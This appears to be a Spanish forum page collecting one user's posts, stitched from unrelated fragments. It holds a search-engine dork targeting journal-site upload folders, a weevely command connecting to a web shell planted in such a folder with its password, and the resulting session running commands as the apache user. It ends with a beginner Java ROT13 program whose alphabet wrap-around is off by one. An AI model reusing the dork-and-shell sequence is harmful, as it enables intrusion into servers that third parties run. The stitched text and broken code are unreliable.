No es imposible se llama estadística, pero vamos cada uno tiene su opinion
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menúinurl:public/journals/1/
https://example.com/blah/lo/que/sea
weevely http://mihost/public/journals/12/cover_article_21_en_US.pHp myshellpass
________ __
| | | |-----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v1.0
|_____|
Stealth tiny web shell
[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.
[shell.php] [!] Error: No response
apache@:/var/www/html/public/journals/12 $ id
uid=48(apache) gid=48(apache) grupos=48(apache),100(users)
apache@:/var/www/html/public/journals/12 $ uname
Linux
apache@:/var/www/html/public/journals/12 $
[!] Exiting. Bye ^^
import java.util.Scanner;
public class ArraysFor {
public static void main(String[] args) {
char[] abecedario={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','ñ','o','p','q','r','s','t','u','v','w','x','y','z'};
System.out.println("Introduce el numero de caracteres a cifrar en ROOT13");
Scanner scann = new Scanner (System.in);
int maximo = scann.nextInt();
char letra[];
letra = new char[maximo];
for (int k=0; k<maximo; k++) {
letra[k] = scann.next().charAt(0);
}
for (int i=0; i<maximo; i++) {
for (int j=0; j<27; j++) {
if (letra[i] == abecedario[j]) {
int x=0;
x = j + 13;
if (x>27) {
x = x - 27;
letra[i]=abecedario[x]; }
else {
letra[i]=abecedario[x]; }
}
}
}
for (int g=0; g<maximo; g++){
System.out.println(letra[g]);
}
}
}